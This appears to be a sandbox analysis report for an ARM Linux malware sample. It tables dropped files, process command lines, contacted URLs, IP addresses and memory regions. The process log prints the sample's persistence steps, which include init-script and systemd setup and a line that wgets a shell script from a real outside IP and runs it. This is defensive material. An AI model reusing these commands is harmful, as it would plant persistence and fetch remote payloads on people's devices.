Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm.nn-20241014-0317.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm.nn-20241014-0317.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.G28qYr (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/rm
|
rm -f /tmp/tmp.jSVYD7rAbM /tmp/tmp.KwWHcPVHap /tmp/tmp.1CeuP2Meep
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/cat
|
cat /tmp/tmp.jSVYD7rAbM
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/head
|
head -n 10
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/tr
|
tr -d \\000-\\011\\013\\014\\016-\\037
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/cut
|
cut -c -80
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/cat
|
cat /tmp/tmp.jSVYD7rAbM
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/head
|
head -n 10
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/tr
|
tr -d \\000-\\011\\013\\014\\016-\\037
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/cut
|
cut -c -80
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/rm
|
rm -f /tmp/tmp.jSVYD7rAbM /tmp/tmp.KwWHcPVHap /tmp/tmp.1CeuP2Meep
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
/tmp/arm.nn-20241014-0317.elf
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn-20241014-0317.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn-20241014-0317.elf'\n
/tmp/arm.nn-20241014-0317.elf &\n wget http://87.120.84.247/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh
&\n ;;\n stop)\n echo 'Stopping arm.nn-20241014-0317.elf'\n killall arm.nn-20241014-0317.elf\n ;;\n restart)\n
$0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" >
/etc/init.d/arm.nn-20241014-0317.elf"
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm.nn-20241014-0317.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm.nn-20241014-0317.elf
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm.nn-20241014-0317.elf /etc/rc.d/S99arm.nn-20241014-0317.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm.nn-20241014-0317.elf /etc/rc.d/S99arm.nn-20241014-0317.elf
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/tmp/arm.nn-20241014-0317.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 58 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://87.120.84.247/
|
unknown
|
||
|
http://87.120.84.247/curl.sh
|
unknown
|
||
|
http://87.120.84.247/lol.sh
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.24
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
60.2.179.233
|
unknown
|
China
|
||
|
71.90.84.28
|
unknown
|
United States
|
||
|
144.61.87.6
|
unknown
|
United States
|
||
|
7.104.147.155
|
unknown
|
United States
|
||
|
133.190.14.88
|
unknown
|
Japan
|
||
|
118.189.140.184
|
unknown
|
Singapore
|
||
|
218.58.233.173
|
unknown
|
China
|
||
|
145.199.40.242
|
unknown
|
Netherlands
|
||
|
58.155.127.143
|
unknown
|
China
|
||
|
63.164.228.174
|
unknown
|
United States
|
||
|
136.232.223.108
|
unknown
|
India
|
||
|
62.242.128.142
|
unknown
|
Denmark
|
||
|
38.156.45.210
|
unknown
|
United States
|
||
|
22.157.45.81
|
unknown
|
United States
|
||
|
118.4.131.201
|
unknown
|
Japan
|
||
|
101.30.217.91
|
unknown
|
China
|
||
|
197.233.4.93
|
unknown
|
Namibia
|
||
|
196.248.64.178
|
unknown
|
South Africa
|
||
|
170.44.217.44
|
unknown
|
United States
|
||
|
75.176.39.153
|
unknown
|
United States
|
||
|
218.199.73.132
|
unknown
|
China
|
||
|
189.54.53.218
|
unknown
|
Brazil
|
||
|
90.204.8.205
|
unknown
|
United Kingdom
|
||
|
75.186.114.23
|
unknown
|
United States
|
||
|
223.121.246.160
|
unknown
|
China
|
||
|
154.144.81.35
|
unknown
|
Morocco
|
||
|
167.214.165.175
|
unknown
|
United States
|
||
|
28.12.136.149
|
unknown
|
United States
|
||
|
136.30.86.103
|
unknown
|
United States
|
||
|
68.231.151.25
|
unknown
|
United States
|
||
|
179.172.125.53
|
unknown
|
Brazil
|
||
|
137.58.139.115
|
unknown
|
Sweden
|
||
|
180.122.11.212
|
unknown
|
China
|
||
|
12.34.60.180
|
unknown
|
United States
|
||
|
76.45.126.210
|
unknown
|
United States
|
||
|
222.50.212.47
|
unknown
|
China
|
||
|
94.109.45.197
|
unknown
|
Belgium
|
||
|
76.51.26.114
|
unknown
|
United States
|
||
|
161.180.255.133
|
unknown
|
United States
|
||
|
25.100.116.200
|
unknown
|
United Kingdom
|
||
|
121.167.70.111
|
unknown
|
Korea Republic of
|
||
|
26.237.48.246
|
unknown
|
United States
|
||
|
58.184.254.124
|
unknown
|
Korea Republic of
|
||
|
183.24.36.75
|
unknown
|
China
|
||
|
113.139.152.89
|
unknown
|
China
|
||
|
21.240.224.232
|
unknown
|
United States
|
||
|
115.137.207.100
|
unknown
|
Korea Republic of
|
||
|
11.147.162.50
|
unknown
|
United States
|
||
|
197.150.13.15
|
unknown
|
Egypt
|
||
|
199.193.73.16
|
unknown
|
United States
|
||
|
198.187.107.120
|
unknown
|
United States
|
||
|
34.159.179.219
|
unknown
|
United States
|
||
|
114.23.169.157
|
unknown
|
New Zealand
|
||
|
41.218.15.247
|
unknown
|
Sudan
|
||
|
128.154.192.204
|
unknown
|
United States
|
||
|
117.53.22.115
|
unknown
|
Japan
|
||
|
40.130.137.135
|
unknown
|
United States
|
||
|
217.245.69.16
|
unknown
|
Germany
|
||
|
170.51.231.38
|
unknown
|
Argentina
|
||
|
206.127.201.19
|
unknown
|
United States
|
||
|
148.30.143.103
|
unknown
|
United States
|
||
|
210.36.69.144
|
unknown
|
China
|
||
|
152.100.20.129
|
unknown
|
United States
|
||
|
144.23.48.89
|
unknown
|
Costa Rica
|
||
|
179.74.214.51
|
unknown
|
Brazil
|
||
|
205.1.63.222
|
unknown
|
United States
|
||
|
136.11.219.221
|
unknown
|
United States
|
||
|
187.229.43.185
|
unknown
|
Mexico
|
||
|
116.81.14.143
|
unknown
|
Japan
|
||
|
3.64.174.92
|
unknown
|
United States
|
||
|
103.162.50.15
|
unknown
|
unknown
|
||
|
26.192.83.58
|
unknown
|
United States
|
||
|
97.144.64.128
|
unknown
|
United States
|
||
|
101.189.115.110
|
unknown
|
Australia
|
||
|
101.170.62.113
|
unknown
|
Australia
|
||
|
103.123.2.198
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
22.50.129.63
|
unknown
|
United States
|
||
|
76.105.207.98
|
unknown
|
United States
|
||
|
143.107.153.163
|
unknown
|
Brazil
|
||
|
119.26.22.66
|
unknown
|
Japan
|
||
|
223.95.37.178
|
unknown
|
China
|
||
|
158.159.239.32
|
unknown
|
United States
|
||
|
137.32.110.55
|
unknown
|
United States
|
||
|
52.103.164.171
|
unknown
|
United States
|
||
|
47.0.213.212
|
unknown
|
United States
|
||
|
70.72.47.223
|
unknown
|
Canada
|
||
|
199.165.65.73
|
unknown
|
United States
|
||
|
209.221.170.119
|
unknown
|
United States
|
||
|
87.147.245.62
|
unknown
|
Germany
|
||
|
161.222.58.39
|
unknown
|
United States
|
||
|
59.66.104.205
|
unknown
|
China
|
||
|
132.233.237.197
|
unknown
|
United States
|
||
|
220.30.182.158
|
unknown
|
Japan
|
||
|
126.212.151.68
|
unknown
|
Japan
|
||
|
189.109.13.95
|
unknown
|
Brazil
|
||
|
111.103.22.104
|
unknown
|
Japan
|
||
|
177.146.22.217
|
unknown
|
Brazil
|
||
|
91.82.65.105
|
unknown
|
Hungary
|
||
|
88.244.32.140
|
unknown
|
Turkey
|
||
|
193.143.1.59
|
unknown
|
unknown
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f8c14032000
|
page execute read
|
|
||
|
7f8c14032000
|
page execute read
|
|
||
|
7ffd2f7c4000
|
page read and write
|
|||
|
7f8d1b865000
|
page read and write
|
|||
|
7f8d1bd94000
|
page read and write
|
|||
|
7f8c1403e000
|
page read and write
|
|||
|
56011d301000
|
page read and write
|
|||
|
7f8c1403e000
|
page read and write
|
|||
|
7f8d1bf26000
|
page read and write
|
|||
|
7f8d1bee1000
|
page read and write
|
|||
|
7f8d1b842000
|
page read and write
|
|||
|
7f8d1bd94000
|
page read and write
|
|||
|
7f8d1b275000
|
page read and write
|
|||
|
560120d9c000
|
page read and write
|
|||
|
7ffd2f7d9000
|
page execute read
|
|||
|
7ffd2f7c4000
|
page read and write
|
|||
|
7f8d1bbb3000
|
page read and write
|
|||
|
560120d9c000
|
page read and write
|
|||
|
7f8d1b275000
|
page read and write
|
|||
|
7f8c1403a000
|
page read and write
|
|||
|
7f8d1a9db000
|
page read and write
|
|||
|
7f8d1b5d7000
|
page read and write
|
|||
|
7f8d1b1e3000
|
page read and write
|
|||
|
7ffd2f7d9000
|
page execute read
|
|||
|
56011f2ff000
|
page execute and read and write
|
|||
|
56011f316000
|
page read and write
|
|||
|
7f8d1b1e3000
|
page read and write
|
|||
|
56011d0a7000
|
page execute read
|
|||
|
7f8d1bf26000
|
page read and write
|
|||
|
7f8d1b5d7000
|
page read and write
|
|||
|
7f8d1b9d1000
|
page read and write
|
|||
|
7f8d1bebd000
|
page read and write
|
|||
|
7f8d1bee1000
|
page read and write
|
|||
|
7f8d1bbb3000
|
page read and write
|
|||
|
7f8d1b842000
|
page read and write
|
|||
|
56011d301000
|
page read and write
|
|||
|
7f8d14021000
|
page read and write
|
|||
|
7f8d13fff000
|
page read and write
|
|||
|
7f8d14021000
|
page read and write
|
|||
|
56011d2f8000
|
page read and write
|
|||
|
7f8d13fff000
|
page read and write
|
|||
|
7f8d1b865000
|
page read and write
|
|||
|
56011d0a7000
|
page execute read
|
|||
|
7f8d1bebd000
|
page read and write
|
|||
|
56011f2ff000
|
page execute and read and write
|
|||
|
7f8c14043000
|
page read and write
|
|||
|
7f8c1403a000
|
page read and write
|
|||
|
7f8d1a9db000
|
page read and write
|
|||
|
56011f316000
|
page read and write
|
|||
|
56011d2f8000
|
page read and write
|
|||
|
7f8d1b9d1000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.